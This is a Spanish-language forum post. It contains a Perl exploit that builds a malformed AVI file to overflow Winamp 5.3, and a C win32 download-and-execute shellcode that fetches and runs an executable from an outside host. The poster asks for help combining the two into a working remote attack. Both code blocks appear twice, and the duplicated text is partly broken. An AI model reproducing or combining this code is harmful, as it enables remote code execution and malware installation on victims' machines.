Autor
Código:
#!/usr/bin/perl
# Winamp Buffer Overflow DOS Exploit (0-DAY)
# Testet:Ver 5.3
# Discoverd By = DeltahackingTEAM Bug Found & Exploitet By /Farzad.Sharifi(Dr.Trojan)
# Risk = High
#Exploit(EXE) =http://www.deltahacking.net/exp/winamp.exe
#Exploit(PL) =http://www.deltahacking.net/exp/winamp.pl
#OverflowFile(Avi) =http://www.deltahacking.net/exp/Dr.Trojan.avi
# Winamp Media Player Download=>http://www.winamp.com/
{
print "\n================================================================================\n";
print "\ DeltahackingTEAM \n";
print "\ Delta.Secure[A]Gmail.com\n";
print "\ Winamp Buffer Overflow DOS Exploit \n";
print "\We Are:Dr.Trojan,H!v++,D_7j,Impostor,Vpc,LOrd, Dr.Pantagon..Tanks 4 Mr.Str0ke \n";
print "\Http://Deltahacking.net & Http://DeltaSecurity.ir & Http://PersianWhois.com\n ";
print "\ n-------------------Exploit Completed(File Create)!-------------------\n";
print "\n================================================================================\n";
}
open(avi, ">./Dr.Trojan.avi");
print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
#0nLy Iran :X
#Farzad.Sharifi
# milw0rm.com [2007-04-23]
# Winamp Buffer Overflow DOS Exploit (0-DAY)
# Testet:Ver 5.3
# Discoverd By = DeltahackingTEAM Bug Found & Exploitet By /Farzad.Sharifi(Dr.Trojan)
# Risk = High
#Exploit(EXE) =http://www.deltahacking.net/exp/winamp.exe
#Exploit(PL) =http://www.deltahacking.net/exp/winamp.pl
#OverflowFile(Avi) =http://www.deltahacking.net/exp/Dr.Trojan.avi
# Winamp Media Player Download=>http://www.winamp.com/
{
print "\n================================================================================\n";
print "\ DeltahackingTEAM \n";
print "\ Delta.Secure[A]Gmail.com\n";
print "\ Winamp Buffer Overflow DOS Exploit \n";
print "\We Are:Dr.Trojan,H!v++,D_7j,Impostor,Vpc,LOrd, Dr.Pantagon..Tanks 4 Mr.Str0ke \n";
print "\Http://Deltahacking.net & Http://DeltaSecurity.ir & Http://PersianWhois.com\n ";
print "\ n-------------------Exploit Completed(File Create)!-------------------\n";
print "\n================================================================================\n";
}
open(avi, ">./Dr.Trojan.avi");
print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
print avi "\x4D\x54\x68\x64";
#0nLy Iran :X
#Farzad.Sharifi
# milw0rm.com [2007-04-23]
¿Es posible acoplar esta shellcode al buffer overflow de arriba?
Lo he intentado pero nada...
no manejo muy bien las shellcodes, espero vuestra ayuda saludos!Código:
/*
\ ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode ::
\ :: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:> ::
\ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::
\
*/
#include <stdio.h>
#include <string.h>
unsigned char sh4llcode[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"
"http://h0nest.org/1.exe";
int main()
{
void (*c0de)();
printf("Win32 \"download & exec shellcode\"\n");
*(int*)&c0de = sh4llcode;
c0de();
}
// milw0rm.com [2005-12-23]
\ ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode ::
\ :: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:> ::
\ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::
\
*/
#include <stdio.h>
#include <string.h>
unsigned char sh4llcode[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"
"http://h0nest.org/1.exe";
int main()
{
void (*c0de)();
printf("Win32 \"download & exec shellcode\"\n");
*(int*)&c0de = sh4llcode;
c0de();
}
// milw0rm.com [2005-12-23]
En línea
